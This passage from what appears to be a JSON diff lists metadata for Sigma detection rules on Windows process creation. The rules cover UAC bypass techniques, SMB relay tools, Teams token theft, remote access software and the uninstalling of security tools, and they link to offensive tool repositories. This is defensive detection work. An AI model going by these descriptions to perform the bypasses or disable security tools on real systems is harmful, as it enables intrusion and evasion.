"https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/09/16", + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "author": "@SerkinValery", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", + "value": "Terminal Service Process Spawn", + "meta": { + "refs": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "creation_date": "2019/05/22", + "filename": "proc_creation_win_termserv_proc_spawn.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", + "value": "SMB Relay Attack Tools", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1557/001/", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://github.com/ohpe/juicy-potato", + 
"https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ], + "creation_date": "2021/07/24", + "filename": "proc_creation_win_tools_relay_attacks.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Legitimate files with these rare hacktool names" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "value": "UAC Bypass Tools Using ComputerDefaults", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/31", + "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "value": "NirCmd Tool Execution", + "meta": { + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_nircmd.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "value": "NirCmd Tool Execution As LOCAL SYSTEM", + "meta": { + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", + "level": "high", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NSudo tool for command execution", + "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", + "value": "NSudo Tool Execution", + "meta": { + "refs": [ + "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + 
"filename": "proc_creation_win_tool_nsudo_execution.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service execution via default service image name", + "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", + "value": "PsExec Tool Execution", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "proc_creation_win_tool_psexec.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of RunXCmd tool for command execution", + "uuid": "93199800-b52a-4dec-b762-75212c196542", + "value": "RunXCmd Tool Execution As System", + "meta": { + "refs": [ + "https://www.d7xtech.com/free-software/runx/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/01/24", + "filename": "proc_creation_win_tool_runx_as_system.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "uuid": 
"62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "value": "Tor Client or Tor Browser Use", + "meta": { + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ], + "creation_date": "2022/02/20", + "filename": "proc_creation_win_tor_browser.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of TruffleSnout.exe", + "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "value": "Launch TruffleSnout Executable", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_trufflesnout.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. 
This technique is used by attackers to enumerate Active Directory trusts.", + "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", + "value": "Domain Trust Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_trust_discovery.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", + "level": "medium", + "falsepositive": [ + "Legitimate use of the utilities by legitimate user for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "value": "UAC Bypass Using ChangePK and SLUI", + "meta": { + "refs": [ + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", + "author": 
"Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "value": "UAC Bypass Using Disk Cleanup", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", + "value": "Bypass UAC via CMSTP", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_uac_bypass_cmstp.yml", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate use of cmstp.exe utility by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "value": "UAC Bypass Using Consent and Comctl32 - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "value": "UAC Bypass Using DismHost", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_dismhost.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "value": "UAC Bypass Using Event Viewer RecentViews", + 
"meta": { + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "creation_date": "2022/11/22", + "filename": "proc_creation_win_uac_bypass_eventvwr.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "value": "Bypass UAC via Fodhelper.exe", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_uac_bypass_fodhelper.yml", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate use of fodhelper.exe utility by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "value": "UAC Bypass via Windows Firewall Snap-In Hijack", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "value": "UAC Bypass via ICMLuaUtil", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_uac_bypass_icmluautil.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", + "value": "UAC Bypass Using IDiagnostic Profile", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/07/03", + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "value": "UAC Bypass Using IEInstal - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_ieinstal.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "value": "UAC Bypass Using MSConfig Token Modification - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" + 
], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "value": "UAC Bypass Using NTFS Reparse Point - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "value": "UAC Bypass Using PkgMgr and DISM", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass 
using a path parsing issue in winsat.exe (UACMe 52)", + "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "value": "UAC Bypass Abusing Winsat Path Parsing - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_winsat.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "value": "UAC Bypass Using Windows Media Player - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_wmp.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). 
Adversaries use this technique to execute privileged processes.", + "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "value": "Bypass UAC via WSReset.exe", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://twitter.com/ReaQta/status/1222548288731217921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_uac_bypass_wsreset.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown sub processes of Wsreset.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "value": "UAC Bypass WSReset", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + 
"description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", + "value": "Use of UltraViewer Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/25", + "filename": "proc_creation_win_ultraviewer.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", + "value": "Use of UltraVNC Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/10/02", + "filename": "proc_creation_win_ultravnc.yml", + "author": 
"frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "value": "Uninstall Crowdstrike Falcon", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/12", + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Uninstall by admin" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", + "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "value": "Uninstall Sysinternals Sysmon", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/01/12", + "filename": "proc_creation_win_uninstall_sysmon.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an unexpected process 
spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "value": "Unusual Child Porcess of dns.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious parent process for cmd.exe", + "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", + "value": "Unusual Parent Process for cmd.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/21", + "filename": "proc_creation_win_unusual_parent_for_cmd.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "value": "User Discovery And Export Via Get-ADUser Cmdlet", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + 
